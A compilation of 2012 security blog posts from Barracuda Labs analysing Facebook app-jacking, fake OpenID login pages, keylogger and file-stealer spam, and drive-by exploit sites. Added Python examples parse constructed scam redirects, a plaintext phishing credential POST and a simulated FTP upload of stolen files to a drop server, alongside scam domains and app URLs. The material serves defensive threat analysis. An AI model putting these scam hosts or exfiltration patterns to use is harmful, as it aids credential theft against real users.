See Who Viewed your Facebook Profile – Popular Facebook Scam Technique

May 10, 2012

by Jason Ding – Barracuda Labs

Many Facebook users have the same burning questions – who viewed their Facebook profile? And who viewed them the most?

Facebook states on its FAQ page that no such functionality exists, neither in its own platform nor through third-party applications. The demand for an answer has nevertheless grown year after year, and it has created plenty of "business" opportunities for scammers and phishers.

The scam uses curiosity as the hook to trick Facebook users into spamming their own social networks. Here we revisit the profile-viewer scam and look at how it has evolved on this giant social platform.

Remember the click-jacking attacks on Facebook last year? Attackers used the Facebook Open Graph "Like" button, enlarged and placed over a video screen, to trick users into liking a page and then redirected them to sign up for paid affiliate services. Those techniques are old now and easy to clean up after: the victim simply removes the related posts.

A newer scam, more advanced than click-jacking, has just started to become popular on Facebook. It uses the same "profile viewer" curiosity as the hook, but it relies on Facebook apps to obtain the user's information and permission to post. The whole process works as follows.

Several photo posts are created first, each tagging many users and carrying a bit.ly shortened link in the photo description.

Following the shortened link, we were redirected several times (via a file hosted on Amazon S3, then zoomdamx.com, then tikoroom.com) before landing on a Facebook application permission page.


To install the profile viewer app "My Match", you have to grant it permissions: your basic information, access to your photos, and the right to post on your behalf. Once you allow these permissions two things happen: a) you are redirected to a non-Facebook page demanding that you complete a survey to unlock the "real" app, and b) a new album is created in your photos containing the same scam photo, with all your friends tagged in it.


Now all of your friends see this photo and may be tricked as well. To unlock the app you must complete the survey, which, unsurprisingly, requires signing up for a string of affiliate advertisements and paid services.


Here is the interesting part. If you click the link in the photo that the "My Match" app auto-posted to your profile, another application, also called "My Match", asks for your permission. At first glance this app appears able to spawn new apps of its own kind on demand. Very sophisticated.


Fortunately, that is not the case. After several permission requests, we found that the scam has only a limited set of alternative paths leading victims to a pool of pre-created scam applications, presumably to avoid detection by Facebook and by malicious-URL analysis services. Here are the four applications:

http://www.facebook.com/apps/application.php?id=215925598521769

http://www.facebook.com/apps/application.php?id=291003840984532

http://www.facebook.com/apps/application.php?id=163011840492520

http://www.facebook.com/apps/application.php?id=257527217679114

Whenever one of these apps is used (even without finishing the survey), a new album tagging all of your friends is created, with another bit.ly URL in the description to snare new victims. The album page in the following image was captured while we were tracking down all of these "scam" applications. I bet all of my friends are upset.


Compared with click-jacking, this new scam is clearly more advanced and has more impact on your network. More serious still, the app owners can access and control more of the information you reveal. Meanwhile, these scam apps stay within Facebook's ToS: they only post using the permissions the user granted.

To avoid detection or banning, the attacker used several intermediate URLs for redirection: 1) a bit.ly shortened URL, 2) an Amazon S3 URL, 3) two newly registered domains. The two transitional domains, zoomdamx.com and tikoroom.com, were registered to an address in India on April 25, 2012 and May 1, 2012, respectively.
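Walking the redirect chain hop by hop, rather than letting the browser or a library auto-follow it, is what exposes the intermediate hosts described above (bit.ly, Amazon S3, zoomdamx.com, tikoroom.com) so each can be checked for registration age and reputation. The following is an added Python example, not Barracuda Labs code; the recorded fixture mirrors the hop sequence in the post, but the short code, S3 bucket, paths and the app id in it are placeholders, and the Facebook OAuth dialog URL stands in for the permission page.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib raise on 3xx instead of following, so we see each hop."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def live_fetch(url, timeout=10):
    """Fetch one URL without following redirects (needs network access).

    Returns (status_code, headers). HEAD keeps us from pulling page bodies
    while walking a chain of hostile sites.
    """
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD",
                                 headers={"User-Agent": "Mozilla/5.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers)
    except urllib.error.HTTPError as err:
        # 3xx (and real errors) land here because redirect_request() returned None.
        return err.code, dict(err.headers)


def follow_chain(start_url, fetch=live_fetch, max_hops=10):
    """Walk a redirect chain hop by hop.

    Returns the ordered hops, the landing URL and why the walk stopped
    ("landed", "loop" or "max-hops"). `fetch` is injectable so the walk can
    be replayed offline against recorded responses.
    """
    hops = [start_url]
    url = start_url
    for _ in range(max_hops):
        status, headers = fetch(url)
        headers = {k.lower(): v for k, v in headers.items()}
        location = headers.get("location") if 300 <= status < 400 else None
        if location is None:
            return {"hops": hops, "landing": url, "ended": "landed", "status": status}
        nxt = urljoin(url, location)  # Location may be relative
        if nxt in hops:
            return {"hops": hops, "landing": nxt, "ended": "loop", "status": status}
        hops.append(nxt)
        url = nxt
    return {"hops": hops, "landing": url, "ended": "max-hops", "status": None}


def hosts_in_chain(result):
    """Distinct hostnames touched, in order: the list to run through WHOIS
    age checks and shortener / free-hosting reputation lookups."""
    hosts = []
    for hop in result["hops"]:
        host = urlsplit(hop).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


# Constructed offline fixture mirroring the hop sequence in the post.
# The short code, S3 bucket, paths and app id are placeholders.
RECORDED_CHAIN = {
    "http://bit.ly/XXXXXXX":
        (301, {"Location": "https://s3.amazonaws.com/bucket-placeholder/go.html"}),
    "https://s3.amazonaws.com/bucket-placeholder/go.html":
        (302, {"Location": "http://zoomdamx.com/in.php"}),
    "http://zoomdamx.com/in.php":
        (302, {"location": "/out.php"}),  # relative Location, lowercase header
    "http://zoomdamx.com/out.php":
        (302, {"Location": "http://tikoroom.com/r.php"}),
    "http://tikoroom.com/r.php":
        (302, {"Location": "https://www.facebook.com/dialog/oauth?client_id=000000000000000"}),
    "https://www.facebook.com/dialog/oauth?client_id=000000000000000":
        (200, {"Content-Type": "text/html"}),
}


def recorded_fetch(url):
    """Offline stand-in for live_fetch that replays RECORDED_CHAIN."""
    return RECORDED_CHAIN[url]


if __name__ == "__main__":
    result = follow_chain("http://bit.ly/XXXXXXX", fetch=recorded_fetch)
    for i, hop in enumerate(result["hops"]):
        print(f"hop {i}: {hop}")
    print("ended:", result["ended"], "| hosts:", ", ".join(hosts_in_chain(result)))
```

Against a live short link, call `follow_chain(url)` with the default `live_fetch`; the loop guard and hop cap matter there because scam redirectors sometimes bounce a scanner between hosts indefinitely or serve a different chain to non-browser user agents.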

To protect yourself and others from this app-jacking scam, two actions are needed: revoke the permissions for "My Match" and remove all the auto-posted albums. Log in to Facebook, go to Account Settings, click Apps in the left panel, and click the "Edit" link for every "My Match" app. Click "Remove" first to delete all posts made by the app, then click "Remove app" to revoke its permissions.


To summarize, click-jacking is old news. This app-jacking may be the scammers' trend for a while, until Facebook takes stronger action to scrutinize app creation.

New spam campaign mimics OpenID, steals credentials

May 4, 2012

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

Spammers and phishers are constantly looking for ways to convince people to type in their passwords and press "Log In". One of the newest strategies we have seen is specially crafted login pages that resemble those of websites using the increasingly popular OpenID standard. An alarming number of spammers are tailoring their phishing messages to this new template.

OpenID is a way for websites to avoid creating their own user accounts. Instead, they rely on authentication services offered by better-known OpenID 'providers'. You have very likely seen websites offering to let you log in with your Facebook, Google or Yahoo account. The website hands control to the provider you select, such as Yahoo. You enter your credentials on a secure page hosted by Yahoo. The website then receives a message back confirming that you supplied valid login credentials. That is OpenID in action.

 

Sample OpenID sign-in dialog

Note that the dialog expressly tells you that you will be visiting Yahoo to log in. That is an important point to keep in mind.

 

What we are seeing at Barracuda Labs are messages that direct you to web pages resembling OpenID portal pages. Take this spam email as an example. What harm could there be in some real estate listings?

Spam

A real estate company logo is used, the text is vague, and the link leads to the compromised website of a yacht service company in Australia. That site serves up this fake login page. The page does not mention OpenID by name, but the growing acceptance of OpenID makes a "choose your provider" page look far less threatening and more 'normal'.

Fake login page


We selected Yahoo and were immediately prompted for our Yahoo credentials by a bit of JavaScript on the page itself. As noted above, this is not how OpenID authentication works: with genuine OpenID we would have been sent to a secure Yahoo web page that asks for the credentials.

Instead, our credentials were unceremoniously sent back to the compromised server in plain text, as the captured TCP stream shows.

Packet capture


Eventually these credentials make their way back to the Phisher.  In the meantime, the browser continues on to the real homepage of a real estate company.
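The difference between the genuine flow (credentials entered on the provider's own HTTPS page) and this fake one (credentials posted in plaintext back to the compromised site) can be checked mechanically on a captured request. The following is an added Python example, not from the post: it parses a raw HTTP request as it would appear in a TCP stream, looks for password-type form fields, and flags a POST whose Host is not one of the identity providers. The request bodies are constructed, and the hostname compromised.example and the paths are placeholders rather than the real sites.

```python
from urllib.parse import parse_qs

# Field names that normally carry the secret, and the account identifier.
SECRET_FIELDS = {"password", "passwd", "pass", "pwd"}
ACCOUNT_FIELDS = {"login", "username", "user", "email", "userid"}

# Providers the post mentions; a genuine "log in with" flow posts only to these.
PROVIDER_HOSTS = ("yahoo.com", "google.com", "facebook.com")


def parse_request(raw: bytes):
    """Split one raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.decode("latin-1")


def _under(host, domains):
    """True if host is one of the domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in domains)


def check_login_post(raw: bytes, provider_hosts=PROVIDER_HOSTS, over_tls=False):
    """Classify a captured request.

    "phish":  a secret field is posted to a host outside the provider list.
    "weak":   posted to a provider host but observed in plaintext.
    "ok":     posted to a provider host over TLS.
    "ignore": not a credential POST at all.
    """
    method, target, headers, body = parse_request(raw)
    if method != "POST":
        return {"verdict": "ignore", "reason": "not a POST"}
    names = {k.lower() for k in parse_qs(body, keep_blank_values=True)}
    secrets = sorted(names & SECRET_FIELDS)
    if not secrets:
        return {"verdict": "ignore", "reason": "no secret field in body"}
    host = headers.get("host", "").split(":")[0].lower()
    on_provider = _under(host, provider_hosts)
    reasons = []
    if not on_provider:
        reasons.append(f"credentials posted to non-provider host {host!r}")
    if not over_tls:
        reasons.append("credentials observed in plaintext")
    verdict = "phish" if not on_provider else ("weak" if reasons else "ok")
    return {"verdict": verdict, "host": host, "target": target,
            "account_fields": sorted(names & ACCOUNT_FIELDS),
            "secret_fields": secrets, "reasons": reasons}


# Constructed request modelled on the captured stream the post describes:
# the page's JavaScript posts the Yahoo credentials back to the compromised
# site. Hostname and path are placeholders, not the real site.
CAPTURED_POST = (
    b"POST /images/listing/login.php HTTP/1.1\r\n"
    b"Host: compromised.example\r\n"
    b"Referer: http://compromised.example/images/listing/\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 54\r\n"
    b"\r\n"
    b"provider=yahoo&login=victim%40yahoo.com&passwd=Hunter2"
)

# What a genuine provider login would look like (path illustrative).
PROVIDER_POST = (
    b"POST /config/login HTTP/1.1\r\n"
    b"Host: login.yahoo.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 39\r\n"
    b"\r\n"
    b"login=victim%40yahoo.com&passwd=Hunter2"
)

if __name__ == "__main__":
    for label, req, tls in (("captured", CAPTURED_POST, False),
                            ("provider", PROVIDER_POST, True)):
        r = check_login_post(req, over_tls=tls)
        print(label, r["verdict"], r.get("reasons", r.get("reason")))
```

The `over_tls` flag exists because a plaintext capture like the one in the post can never be a legitimate provider login: real providers only accept credentials over HTTPS, so anything readable in a TCP stream is suspicious even before the Host check.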

Another example presents itself as a UPS notification email which leads to a fake UPS login page.

 

There are excellent reasons to use OpenID. Website administrators do not have to store and protect a password for your account, and you can reduce the number of user accounts and passwords you manage.

The flip side is that if you choose to use an OpenID provider, such as your favorite email account, you need to be very observant: make certain that your credentials are requested on the provider's own site, with the provider's domain in the address bar and a secure (HTTPS) connection, and not inside a form or script on the site you started from.

 

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails. Barracuda Web Filters and the Barracuda Web Security Flex service stop the download of this threat.

@TakeDownCon Twitter account compromised?

April 25, 2012

by Jason Ding, Research Scientist

It is not rare for ordinary Internet users to have their online accounts spammed, compromised or hacked, given how little most of them know about the dangers of the Web.

Network security professionals, however, should at least know enough to take strong precautions with their own online accounts before helping others or hosting hacking events.

Unfortunately, that is not always the case. Consider this live example: TakeDownCon, "a technical security conference series fundamentally developed to focus on only ONE information security domain per event", just had its Twitter account @TakeDownCon compromised. The account sent direct messages to its followers and posted spam tweets on its own timeline.

An example of the direct message is as follows:


The spam tweets on @TakeDownCon:


The URL in the message directs users to a phishing website that steals Twitter credentials:


The phishing domain itvvitier[.]com was newly registered on April 23, 2012 to an address in Shanghai, China.

Anyone who received these messages should ignore and delete them immediately. As always, do not click any link in an email or message unless you are 100% sure of its origin and intent, and always check the URL in your browser's address bar before logging in to a website.

 

UPDATE: as of this morning, Apr 26 2012 8 AM EST, @TakeDownCon has removed the spam tweets from its page and the phishing website itvvitier[.]com is down.

Political rhetoric ramps up and so does President Obama related spam

April 16, 2012

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

If you are a malware spammer, the number one challenge you face is getting people to open, read and follow the links in your message.

To accomplish this, one of the emotions spammers appeal to most is curiosity. For years spammers have sent emails offering glimpses of gory accidents, scantily clad women and outrageous celebrity behavior: anything that might get you to drop your guard, suspend your critical thinking and click through a dodgy link in the hope of seeing some juicy nugget.

An excellent example fell into the Barracuda Labs spam traps recently. It claimed that President Obama is a homosexual and offered an incriminating picture to prove it. Who wouldn't be curious about that?

Obama is gay email

We actually hope most people wouldn't be. The email is so obviously bogus you might think no one would click the link. Well, in the interest of research we did, and our investigation found that quite a few other people did as well.

Clicking the link in the email and running the download is pretty anticlimactic. The download tries to divert your attention by opening a cute picture of a koala.

distracting picture


Behind the scenes it silently installs a copy of a commercially available keylogger known as Perfect Keylogger. This program monitors every program you run and every keystroke you enter and stores them in a local file, like this example:

Keystroke log file


Perfect Keylogger also captures screenshots periodically and writes them to disk. Every so often it bundles the captured data and sends it to a remote server using the File Transfer Protocol (FTP).

Perfect Keylogger FTP traffic


FTP sends both credentials and data in the clear, so it was possible for us to obtain a listing of the server that receives the keylogger output.

Keylogger FTP site


Only a few days after the spam was first seen, there are a large number of folders on the keylogger drop site, each representing a person who clicked the initial link and ran the downloaded program. Outrageous headlines evidently spur enough curiosity to get people to click links and install malware.

The lesson is not to let curiosity get the better of you, even if the email and link appear to come from a trusted source. If the content is designed to intrigue or titillate, there is a good chance the end result will be unpleasant.

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails. Barracuda Web Filters and the Barracuda Web Security Flex service stop the download of this threat.

Warning: New Facebook Phishing via Facebook Chat and Note

April 6, 2012

by Jason Ding, Research Scientist

Internet attackers never stop working to phish victims with new strategies, even over the coming Easter weekend. Last night, when one of our colleagues logged into his Facebook account to look around, he received the following two Facebook chat messages from his friends:

The text associated with these notes reads as follows:

hey, do you remember this photo? http://m.facebook.com/note.php?note_id=10150721776820528

hey, do you remember this photo? http://m.facebook.com/note.php?note_id=10150657346714077

As most Facebook users chat frequently with their friends, this message is nothing special and looks safe; it is a Facebook Note link. Once you click through, however, the note points to another (non-Facebook) link to see your friend's photo:

The links have the following text:

Click here to open photo > [http]://destinationats[.]com/photo-album/

If you follow this new link, you are redirected to a website that phishes your Facebook credentials or serves malicious content to install malware on your device. Either way, you are under attack. Unfortunately, we do not have a screenshot of the redirected site, but many Facebook users already know it is malicious.

Note that this twist is a different spin on a previous attack: the chat message contains a valid Facebook Note link. Most users trust Facebook URLs and click them.

If you receive such messages, DO NOT click the links. Tell your friends that their passwords may have been compromised and suggest they change them immediately.

Further tracking shows that in this example the attacking domain is rmxdhd[.]com, registered on April 5, 2012 to an address in Russia. Fortunately, the domain is not resolvable at the moment.


Maliciousness in Top-ranked Alexa Domains

March 28, 2012

by Paul Royal, Research Consultant

For the infographic associated with this post, see http://www.barracudalabs.com/goodsitesbad.

At Barracuda Labs, we use a variety of research technologies to identify and study maliciousness on the web. One of these tools is an automated system that forces a web browser inside a Windows virtual machine to visit a URL to see what happens to the browser, its plugins, and the operating system. The resulting network-level actions of the virtual machine help us determine, without prior knowledge of specific exploits served to the browser or its extensions, whether a URL serves malicious content.

A few months ago we began using this system to examine the Alexa 25,000 most popular domains. Because these sites are popular and long-lived, many people assume they are safe to visit. However, automated examination of the Alexa top 25,000 every day during February 2012, which found 58 sites serving drive-by download exploits, shows that this assumption does not always hold.

While Alexa does not publish the total number of page views it uses to determine site rankings, enough information exists to estimate that number. As an example, Wikipedia, which represented ~0.54% of total Alexa views in February 2012, itself reported ~15.75 billion views for that 29-day month. Working backwards, Alexa used an average of (15,756 * 1,000,000)/(29 * (0.5416/100)) = ~100.31 billion views per day to rank the popularity of websites.

Using this number, we can calculate the affected views for a given site in a 24-hour period. As an example, free-tv-video-online[.]me, which on February 13 served visitors malicious content via an ad network, represented ~0.0053% of total Alexa views, which yields 5,366,895 affected views for that day. To estimate how many users were served exploit content, however, this number must be adjusted for the average number of views per user, which Alexa also publishes. Continuing the example, free-tv-video-online[.]me averages 7.2 views per user, so 5,366,895 views equates to 745,402 users served malicious content on February 13. Across all 58 sites that (directly or indirectly) served malicious content, there were 44,160,016 affected views from 10,541,379 users.

Of course, not every user served malicious content was compromised. To estimate the number of successfully exploited users, we used several sources, including Wikipedia's browser statistics. Looking first at platform and browser popularity, only about half of users (50.81%, those running Windows with IE or Firefox) have properties conducive to exploitation.

To convert possibly compromised users into probably compromised ones, we conservatively adjusted for the most popular exploitation mechanism, the Java plugin. According to Adobe, 73% of PC users have the Java plugin installed, and according to Qualys, 42% of users with the Java plugin have versions vulnerable to exploitation. Thus, of 10,541,379 users served malicious content, 42% (insecure Java) of 73% (Java installed) of 50.81% (Windows and Firefox/IE), or 1,642,172, were likely compromised.
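The estimation chain above (calibrating Alexa's daily view total from Wikipedia, converting a site's share into views and users, and applying the three exploitability factors) is easy to get wrong by a factor of 100 through a misplaced percent sign, so here it is as an added Python example that reproduces the post's figures from the numbers quoted in it. This is not Barracuda Labs code; the 58-site table is not reproduced, and the per-site result for free-tv-video-online[.]me recomputed from the rounded 0.0053% share differs from the post's 5,366,895 by under 1%.

```python
from dataclasses import dataclass

DAYS_IN_FEB_2012 = 29

# Calibration point quoted in the post: Wikipedia's share of Alexa views and
# the page views Wikipedia itself reported for February 2012.
WIKIPEDIA_SHARE_PCT = 0.5416
WIKIPEDIA_VIEWS_FEB_2012 = 15_756 * 1_000_000

# Exploitability factors quoted in the post (Wikipedia browser statistics,
# Adobe's Java-install figure, Qualys' vulnerable-Java figure).
WINDOWS_IE_FF_SHARE = 0.5081
JAVA_INSTALLED = 0.73
JAVA_VULNERABLE = 0.42


def alexa_daily_views(known_share_pct, known_monthly_views, days):
    """Back out the daily view total Alexa ranks against from one site whose
    own monthly view count and Alexa share are both known."""
    return known_monthly_views / (days * (known_share_pct / 100.0))


def affected_views(site_share_pct, total_daily_views):
    """Views a site received on the day it served exploit content."""
    return total_daily_views * site_share_pct / 100.0


def users_from_views(views, views_per_user):
    """Collapse views to users with the site's Alexa views-per-user figure."""
    return int(round(views / views_per_user))


def likely_compromised(users_served):
    """Apply the post's three multiplicative filters: exploitable platform,
    Java installed, Java version vulnerable."""
    return int(users_served * WINDOWS_IE_FF_SHARE * JAVA_INSTALLED * JAVA_VULNERABLE)


@dataclass
class SiteExposure:
    views: int        # affected views on the day exploit content was served
    users: int        # affected views adjusted by views per user
    compromised: int  # users likely exploited


def estimate_site(site_share_pct, views_per_user, total_daily_views):
    """Run the whole chain for one site from its Alexa share and views/user."""
    views = affected_views(site_share_pct, total_daily_views)
    users = users_from_views(views, views_per_user)
    return SiteExposure(int(round(views)), users, likely_compromised(users))


if __name__ == "__main__":
    total = alexa_daily_views(WIKIPEDIA_SHARE_PCT, WIKIPEDIA_VIEWS_FEB_2012, DAYS_IN_FEB_2012)
    print(f"Alexa daily views: {total / 1e9:.2f} billion")
    # free-tv-video-online[.]me, February 13: share and views/user from the post.
    print(estimate_site(0.0053, 7.2, total))
    # The post's per-site view count came from an unrounded share; starting
    # from its 5,366,895 views reproduces its user figure exactly.
    print(users_from_views(5_366_895, 7.2))
    print(likely_compromised(10_541_379))
```

Note that `likely_compromised` truncates rather than rounds; with the post's 10,541,379 users the product is 1,642,172.49, which is how the post arrives at 1,642,172.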

In addition to our statistical analysis used to estimate the number of users compromised by visiting Alexa top-ranked domains that served malicious content, we offer the following summary observations:

  • On average, two of the Alexa top 25,000 domains served malicious content each day (58 sites over 29 days). Statistically, a user should expect some popular website to be serving malicious content on any given day.
  • Alexa top-ranked domains served malicious content on 23 of the 29 days in February (79%). The problem is therefore not isolated; it occurs on a continuous, regular basis.
  • The Alexa top-ranked domains that served malicious content were spread across 18 countries, so the problem has no geographic barrier.
  • Over 97% of the sites that served malicious content were at least one year old, and more than half were more than five years old, so attackers are using well-established, long-lived websites for their drive-by download campaigns.

A table listing the 58 sites that served visitors drive-by download exploits, including each site's Alexa rank, the date exploit content was served, the number of affected views and users, and the subset likely compromised, is available for download here. An archive of packet capture (PCAP) files showing the exact sequence of events that led to system compromise can be obtained through the Barracuda Labs Contact Form.

Verizon bill for $954 attacks your computer

March 26, 2012

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

A bill from your cell phone company is routine, right? What about when the amount is unexpected – something like $954.19? That would sure get your attention, wouldn’t it? Assuming your carrier was Verizon, you might just find yourself anxiously clicking on one of the links in this convincing email.

Fake Verizon email


That would certainly be a mistake. Every link in this email leads to sites hosting the Blackhole exploit kit, a web application that bombards your browser and its plugins with exploit code in an attempt to take control and download malware. That is just what happened in our test environment: after a series of attacks was delivered, a copy of Trojan.Zbot was downloaded.

Blackhole exploit traffic


Trojan.Zbot, the newest version of a well-known password stealer, monitors your web browsing traffic for username/password pairs, particularly those associated with online banking, and quietly passes them back to a command-and-control center via a distributed peer-to-peer network.

As we repeatedly advise in this blog: never click on links in emails.

You simply cannot tell whether they are benign, phishing, or outright malicious like these. Always open a fresh browser window and type in the address of the website you want to visit yourself.

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails. Barracuda Web Filters and the Barracuda Web Security Flex service stop the download of this threat.

Anonymous wants YOU!

March 19, 2012

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

Uncle Anonymous

Anonymous is a loose coalition of Internet users who take part in international hacking activities, often targeting large security firms or opponents of digital piracy.

They have had some high-profile successes lately, so imagine our surprise when we checked the Barracuda Labs spam traps and found that they are recruiting!

Even though none of us has answered the call, there is plenty of speculation about these widely distributed emails. Are they really from Anonymous members? Perhaps the FBI is looking for people who might answer the call. Or it could simply be someone trolling for mobile phone numbers, which can be abused by premium SMS scammers.

 

Whatever the case, Barracuda Networks customers using the Barracuda Spam & Virus Firewall will have to find some other way to join, because they won’t be receiving these emails.

Facebook promotes a phishing app when browsing Admiral James Stavridis’s Profile

March 15, 2012

by Jason Ding, Research Scientist

Admiral James Stavridis has been in the social media spotlight since an anonymous phishing attack was launched on Facebook a few days ago using a fake version of his profile. It seemed a good time to meet the commander (at least online), so we did a simple study of his official Facebook page at: http://www.facebook.com/james.stavridis?sk=info

After logging in and searching for his name, we landed on his main page: a stylish military profile picture and many posts about his recent comments and visits. Everything seemed legitimate until we noticed an app suggestion with an empty icon at the top right.

We clicked the promoted app to see what was going on. The link brought us to a blank Facebook app page and then quickly redirected us to a non-Facebook URL hosting a copycat Facebook login portal. A Facebook account phishing website!


The phishing URL is bed.funnypictureland.com, and a whois check shows the domain was registered in CA on Feb 17, 2012. We found at least two phishing apps in this case:

[http]://apps.facebook.com/173881296059145/?ref=games_ego

[http]://apps.facebook.com/238028826286401/?ref=games_ego

This is a very popular trick for stealing user accounts and has been rampant for some time. We are not sure exactly what these attackers do with the stolen accounts, but one possibility is posting spam comments or phishing apps on their friends' walls and photos. Victims will not notice the spamming until their friends tell them. See this example of a victim:


One important thing to clarify: this app promotion by Facebook may not be related to the content of the page the user landed on (Admiral Stavridis certainly has nothing to do with this app), but rather based on the applications the viewer has installed. Our test account had visited several "noisy" and "spreading" apps that show lots of ads on their home pages, such as http://apps.facebook.com/myquizz-lwgdvkthql and http://apps.facebook.com/bestieeev-sfcjrnzkcd. Many of these apps are created by "app auto-creating" apps that offer an easy three-click process for spawning new apps.

It seems that Facebook allows an app or a Facebook page to redirect automatically to non-Facebook URLs without any restriction. On the bright side, ordinary websites benefit from Facebook traffic; the dark side is that social users have lived in Facebook's walled garden for so long that they simply trust everything Facebook redirects them to, which makes them far more likely to be tricked by spamming apps and pages.

 

Update (03/15/2012 13:28 EST): Admiral James Stavridis's Facebook page has just switched to Timeline, so you may not be able to see the app promotion on the side. The two phishing apps are still available, however.

Stratfor subscribers targeted by file stealing spam

March 14, 2012

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

Stratfor Global Intel

Strategic Forecasting, Inc., also known as Stratfor, is a private intelligence-analysis firm based in Austin, Texas. In December 2011 the hacker collective Anonymous compromised the company's newsletter subscription database, making off with thousands of logon credentials and credit card numbers.

Internet scammers are quick to latch onto events like these, and the spam traps at Barracuda Labs have turned up messages targeting Stratfor subscribers. With the subject "Stratfor: Beware of false communications", these simple emails contain no text and carry an attached PDF file.

Stratfor related spam

The PDF file itself is not malicious; it contains a poorly worded message encouraging you to download an antivirus package (supposedly McAfee) and scan for a specific virus named Win32Azee.

Stratfor PDF message

There is no virus named Win32Azee, and the download is not McAfee antivirus. It is not an antivirus at all; it is a file stealer that McAfee identifies as PWS-Zbot.gen.ry. You do have to suspend your better judgement, download the file av.zip from a website in Poland and then give it permission to run and install itself. Once that is done, however, the malware gets right to work gathering up files and stored passwords and sending them to a central drop point.

Stratfor file stealer pcap

The first step shown above is the gathering of usernames and passwords stored on the local system. After these are uploaded, the local hard drives are scanned for .PDF, .XLS and .DOC files, and any files found are also uploaded to the remote site.

This malware uses no fancy encryption or obfuscation to transmit the stolen files. Instead, it uses old-school FTP, which runs in clear text, login credentials included. We were able to log into the file repository and see the files stolen from our test machine.
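Both this file stealer and the Perfect Keylogger in the April 16 post exfiltrate over FTP, which means the drop-server login and every STOR command are readable in a captured control channel. The following is an added Python example, not code from either post: it parses a merged client/server FTP control stream, pulls out the credential, the uploaded file names and the per-victim directory they were written to, and derives triage findings. The capture is constructed (account, TEST-NET address and file names are invented), shaped after the behaviour the two posts describe.

```python
import os
import re

# Extensions the Stratfor file stealer harvests from local drives.
DOCUMENT_EXTS = {".pdf", ".xls", ".doc"}

# Server replies start with a three-digit code ("230 ...", "220-banner").
_SERVER_REPLY = re.compile(r"^\d{3}[ -]")


def parse_ftp_control(stream: str) -> dict:
    """Extract credential, uploads and per-victim directories from an FTP
    control-channel capture, and derive findings a triage analyst would want.

    Only client commands are examined; server replies are skipped, so a
    merged bidirectional stream (as shown by a "Follow TCP stream" view)
    can be fed in directly.
    """
    user = password = None
    uploads, downloads = [], []
    for raw in stream.splitlines():
        line = raw.strip()
        if not line or _SERVER_REPLY.match(line):
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            user = arg
        elif verb == "PASS":
            password = arg
        elif verb == "STOR":
            uploads.append(arg)
        elif verb == "RETR":
            downloads.append(arg)

    findings = []
    if user is not None and password is not None:
        findings.append("cleartext credentials on control channel")
    docs = [n for n in uploads if os.path.splitext(n)[1].lower() in DOCUMENT_EXTS]
    if docs:
        findings.append(f"{len(docs)} office document(s) uploaded")
    if len(uploads) >= 3:
        findings.append("bulk upload from a single session")

    # Both posts note one directory per victim on the drop server; the
    # leading path component of each STOR target is that directory.
    victim_dirs = sorted({n.split("/", 1)[0] for n in uploads if "/" in n})
    return {"user": user, "password": password, "uploads": uploads,
            "downloads": downloads, "documents": docs,
            "victim_dirs": victim_dirs, "findings": findings}


# Constructed capture (account, TEST-NET address and file names are
# invented) shaped like the traffic the two posts describe.
CAPTURED_CONTROL = "\r\n".join([
    "220 FTP server ready.",
    "USER drop_user",
    "331 Password required for drop_user",
    "PASS Pa55w0rd",
    "230 User drop_user logged in",
    "TYPE I",
    "200 Type set to I",
    "PASV",
    "227 Entering Passive Mode (203,0,113,10,195,80)",
    "STOR WIN-7K2Q-PC_2012-04-16/keylog_16-04-2012.txt",
    "150 Opening BINARY mode data connection",
    "226 Transfer complete",
    "PASV",
    "227 Entering Passive Mode (203,0,113,10,195,81)",
    "STOR WIN-7K2Q-PC_2012-04-16/Documents/Q1_forecast.xls",
    "150 Opening BINARY mode data connection",
    "226 Transfer complete",
    "PASV",
    "227 Entering Passive Mode (203,0,113,10,195,82)",
    "STOR WIN-7K2Q-PC_2012-04-16/Documents/contract_draft.doc",
    "150 Opening BINARY mode data connection",
    "226 Transfer complete",
    "QUIT",
    "221 Goodbye.",
]) + "\r\n"

if __name__ == "__main__":
    report = parse_ftp_control(CAPTURED_CONTROL)
    print("login:", report["user"], "/", report["password"])
    print("victim dirs:", report["victim_dirs"])
    for f in report["findings"]:
        print(" -", f)
```

The recovered credential is exactly what let the authors of both posts log into the drop servers and count victim directories; the same parse, run over an egress capture at a perimeter, turns an FTP STOR of .doc/.xls/.pdf files to an unfamiliar host into a detection rather than a post-mortem.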

 

File stealer site


We were also able to see that a non-trivial number of people have already done this. Each directory name in the middle pane above corresponds to someone who has downloaded and run the malware.

Stratfor charges for its particularly valued intelligence, so its subscribers are a pre-selected set of important individuals. It is no surprise that malware distributors and data thieves are targeting them a second time.

Our advice is the same as for any email user: don't click on links in emails, no matter how convincing they seem, and only install software from trusted, verified sources.

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails. Barracuda Web Filters and the Barracuda Web Security Flex service stop the download of this threat.